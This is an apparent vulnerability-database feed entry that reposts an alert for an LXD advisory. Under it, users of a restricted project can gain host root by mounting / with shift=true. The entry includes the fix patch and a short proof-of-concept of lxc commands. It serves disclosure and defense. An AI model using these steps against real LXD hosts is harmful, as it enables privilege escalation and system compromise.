Most recent sightings.

https://db.gcve.eu/sightings/feed Most recent sightings. 2026-06-06T22:27:26.672136+00:00 Vulnerability-Lookup info@gcve.eu python-feedgen Contains only the most 10 recent sightings. https://db.gcve.eu/sighting/088acc69-5ebc-4593-a4ec-72bf16850515/export 088acc69-5ebc-4593-a4ec-72bf16850515 2026-06-06T22:27:27.058547+00:00 cedric https://db.gcve.eu/user/cedric {"uuid": "088acc69-5ebc-4593-a4ec-72bf16850515", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X9QQ-236J-GJ97", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3520", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-x9qq-236j-gj97\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Summary\n\nIf a user has restricted access to a project that is configured with `restricted=true`, they can gain root access on the system by creating a disk device with `shift=true` and creating a setuid root executable. This is possible because the `shift` property is not restricted unless `restricted.devices.disk.paths` is set.\n\n### Details\n\nThe following patch shows the offending code with a possible fix:\n```patch\n--- a/lxd/device/disk.go\n+++ b/lxd/device/disk.go\n@@ -429,17 +429,19 @@ func (d *disk) validateEnvironmentSourcePath() error {\n if instProject.Name != api.ProjectDefaultName {\n // If restricted disk paths are in force, then check the disk's source is allowed, and record the\n // allowed parent path for later user during device start up sequence.\n- if shared.IsTrue(instProject.Config[\"restricted\"]) && instProject.Config[\"restricted.devices.disk.paths\"] != \"\" {\n- allowed, restrictedParentSourcePath := project.CheckRestrictedDevicesDiskPaths(instProject.Config, d.config[\"source\"])\n- if !allowed {\n- return fmt.Errorf(\"Disk source path %q not allowed by project for disk %q\", d.config[\"source\"], d.name)\n+ if shared.IsTrue(instProject.Config[\"restricted\"]) {\n+ if instProject.Config[\"restricted.devices.disk.paths\"] != \"\" {\n+ allowed, restrictedParentSourcePath := project.CheckRestrictedDevicesDiskPaths(instProject.Config, d.config[\"source\"])\n+ if !allowed {\n+ return fmt.Errorf(\"Disk source path %q not allowed by project for disk %q\", d.config[\"source\"], d.name)\n+ }\n+\n+ d.restrictedParentSourcePath = shared.HostPath(restrictedParentSourcePath)\n }\n\n if shared.IsTrue(d.config[\"shift\"]) {\n return fmt.Errorf(`The \"shift\" property cannot be used with a restricted source path`)\n }\n-\n- d.restrictedParentSourcePath = shared.HostPath(restrictedParentSourcePath)\n }\n }\n```\n\n### PoC\n\n```bash\n$ lxc project create restricted -c restricted=true -c restricted.devices.disk=allow\n$ lxc project switch restricted\n$ lxc profile device add default root disk path=/ pool=default\n$ lxc init ubuntu:22.04 c1\n$ lxc config device add c1 d1 disk source=/ path=/mnt shift=true\n$ lxc start c1 # no error\n\n$ lxc project set restricted restricted.devices.disk.paths=/ # explicitly allow mounting /\n$ lxc restart c1\nError: Failed to start device \"d1\": The \"shift\" property cannot be used with a restricted source path\n```\n\nCreated https://github.com/canonical/lxd/issues/12606 to improve the documentation as per https://github.com/canonical/lxd/security/advisories/GHSA-x9qq-236j-gj97#advisory-comment-91918\n\ud83d\udccf Published: 2023-12-05T23:32:58Z\n\ud83d\udccf Modified: 2025-01-30T22:49:12Z\n\ud83d\udd17 References:\n1. https://github.com/canonical/lxd/security/advisories/GHSA-x9qq-236j-gj97\n2. https://github.com/canonical/lxd/issues/12606\n3. https://github.com/canonical/lxd/commit/ce1bd0dd37bb3810fe6f16c237a4b65257f231f1\n4. https://github.com/canonical/lxd", "creation_timestamp": "2025-01-30T23:12:34.000000Z"} 2025-01-30T23:12:34+00:00